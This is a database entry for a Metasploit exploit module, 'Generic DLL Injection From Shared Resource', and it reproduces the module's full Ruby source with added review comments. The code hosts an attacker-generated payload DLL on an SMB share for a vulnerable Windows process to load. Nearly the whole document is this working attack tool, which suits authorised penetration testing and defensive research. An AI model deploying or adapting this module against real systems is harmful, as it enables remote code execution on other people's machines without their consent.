Generic DLL Injection From Shared Resource

2015-03-04T22:38:08
ID MSF:EXPLOIT/WINDOWS/SMB/GENERIC_SMB_DLL_INJECTION
Type metasploit
Reporter Rapid7
Modified 2017-09-17T20:00:04

Description

This is a general-purpose module for exploiting conditions where a DLL can be loaded from a specified SMB share. This module serves payloads as DLLs over an SMB service.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

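class MetasploitModule < Msf::Exploit::Remote
  # Manual ranking: this module only hosts the DLL. Nothing here triggers the
  # load -- the operator must separately cause the target to resolve and load
  # the file from the UNC path printed in setup.
  Rank = ManualRanking

  # Share stands up the SMB server and (as used below) provides file_name=,
  # file_contents= and unc. EXE provides generate_payload_dll.
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # Registers module metadata and the single FILE_NAME option.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Generic DLL Injection From Shared Resource',
      'Description'   => %q{
        This is a general-purpose module for exploiting conditions where a DLL can be loaded
        from a specified SMB share. This module serves payloads as DLLs over an SMB service.
      },
      'Author'      =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'References'     =>
        [
          ['CWE', '114']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => false,
      'Platform'       => 'win',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 04 2015'
    ))

    register_options(
      [
        # Optional. Unset or blank -> a random alphabetic name with a .dll suffix
        # (see setup). A supplied name is used verbatim: no extension is appended,
        # so it must match exactly what the target tries to load.
        OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
      ])

    # The shared file is always the generated payload DLL (see setup), so the
    # Share mixin's generic FILE_CONTENTS option would be misleading here.
    deregister_options('FILE_CONTENTS')
  end

  # Builds the payload DLL and publishes it on the SMB share.
  #
  # FILE_NAME counts as unset when it is nil *or* an empty string. The previous
  # `datastore['FILE_NAME'] || ...` fallback only covered nil, so an empty
  # string produced a share entry with no name at all.
  #
  # NOTE(review): the DLL is presumably served to any client that can reach the
  # SMB service, not just the intended target -- confirm against the Share
  # mixin and keep the listener's exposure (interface/port) as narrow as the
  # engagement allows.
  def setup
    super

    # Architecture follows the selected target; the DLL's bitness has to match
    # the process that will load it.
    self.file_contents = generate_payload_dll

    requested_name = datastore['FILE_NAME'].to_s
    self.file_name =
      if requested_name.empty?
        "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
      else
        requested_name
      end

    print_status("File available on #{unc}...")
  end
end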